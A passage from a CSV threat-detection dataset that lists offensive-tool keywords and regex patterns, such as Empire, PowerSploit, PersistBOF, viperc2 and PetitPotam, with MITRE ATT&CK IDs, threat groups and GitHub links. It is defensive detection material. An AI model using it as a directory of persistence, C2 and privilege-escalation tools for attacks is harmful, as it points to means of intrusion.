is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*Persist\winlogon.cs*",".{0,1000}Persist\\winlogon\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*PersistBOF.cna*",".{0,1000}PersistBOF\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*Persistence.cpp*",".{0,1000}Persistence\.cpp.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a 
post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*Persistence.exe*",".{0,1000}Persistence\.exe.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*Persistence.psm1*",".{0,1000}Persistence\.psm1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Persistence.psm1*",".{0,1000}Persistence\.psm1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1117","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Persistence.psm1*",".{0,1000}Persistence\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Persistence/InstallWMI*",".{0,1000}Persistence\/InstallWMI.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Persistence_AccountManipulation_Windows.py*",".{0,1000}Persistence_AccountManipulation_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_Guard_Windows.py*",".{0,1000}Persistence_Guard_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_LogonScripts_Windows.py*",".{0,1000}Persistence_LogonScripts_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_NewService_Windows.py*",".{0,1000}Persistence_NewService_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_OfficeApplicationStartup_OfficeTest.py*",".{0,1000}Persistence_OfficeApplicationStartup_OfficeTest\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 
- T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_Other_WindowsLibraryMs.py*",".{0,1000}Persistence_Other_WindowsLibraryMs\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_RegistryRunKeys_SharpHide.py*",".{0,1000}Persistence_RegistryRunKeys_SharpHide\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_RegistryRunKeys_Windows.py*",".{0,1000}Persistence_RegistryRunKeys_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - 
T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_ScheduledTask_Windows.py*",".{0,1000}Persistence_ScheduledTask_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_WinlogonHelperDLL_Windows.py*",".{0,1000}Persistence_WinlogonHelperDLL_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence-Accessibility-Features-master*",".{0,1000}Persistence\-Accessibility\-Features\-master.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" 
"*PersistenceBOF.c*",".{0,1000}PersistenceBOF\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*PersistenceBOF.exe*",".{0,1000}PersistenceBOF\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 
- T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*persistent-security/SMShell*",".{0,1000}persistent\-security\/SMShell.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","344","37","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*persist-ice-junction.o*",".{0,1000}persist\-ice\-junction\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*persist-ice-monitor.o*",".{0,1000}persist\-ice\-monitor\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*persist-ice-shortcut.o*",".{0,1000}persist\-ice\-shortcut\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*persist-ice-time.o*",".{0,1000}persist\-ice\-time\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*persist-ice-xll.o*",".{0,1000}persist\-ice\-xll\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*PersStartup.cs*",".{0,1000}PersStartup\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PEScrambler.exe*",".{0,1000}PEScrambler\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 
shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*PetitPotam bypass via RPC_C_AUTHN_LEVEL_PKT_PRIVACY*",".{0,1000}PetitPotam\sbypass\svia\sRPC_C_AUTHN_LEVEL_PKT_PRIVACY.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*PetitPotam.cna*",".{0,1000}PetitPotam\.cna.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*PetitPotam.cpp*",".{0,1000}PetitPotam\.cpp.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*PetitPotam.exe*",".{0,1000}PetitPotam\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - 
TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*PetitPotam.exe*",".{0,1000}PetitPotam\.exe.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*PetitPotam.ps1*",".{0,1000}PetitPotam\.ps1.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*PetitPotam.py*",".{0,1000}PetitPotam\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*petitpotam.py*",".{0,1000}petitpotam\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*petitpotam.py*",".{0,1000}petitpotam\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - 
